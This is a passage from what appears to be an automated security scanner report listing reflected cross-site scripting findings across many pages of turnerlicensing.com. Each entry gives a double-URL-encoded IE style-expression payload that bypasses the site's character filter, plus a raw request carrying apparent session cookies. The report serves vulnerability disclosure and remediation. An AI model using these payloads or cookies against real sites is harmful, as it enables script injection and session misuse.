GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.124. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Toronto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.125. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Utah
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.126. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vancouver
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.127. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Vermont
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72a41'style='x:expression(alert(1))'34af1748ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Vermont?72a41%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252734af1748ca7=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.128. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.129. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.130. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington-D-C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.131. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/West-Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.132. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wisconsin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.133. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wyoming
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.134. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.135. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_about_us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.136. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_boxed_note_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.137. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_christmas_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.138. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_deluxe_journals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
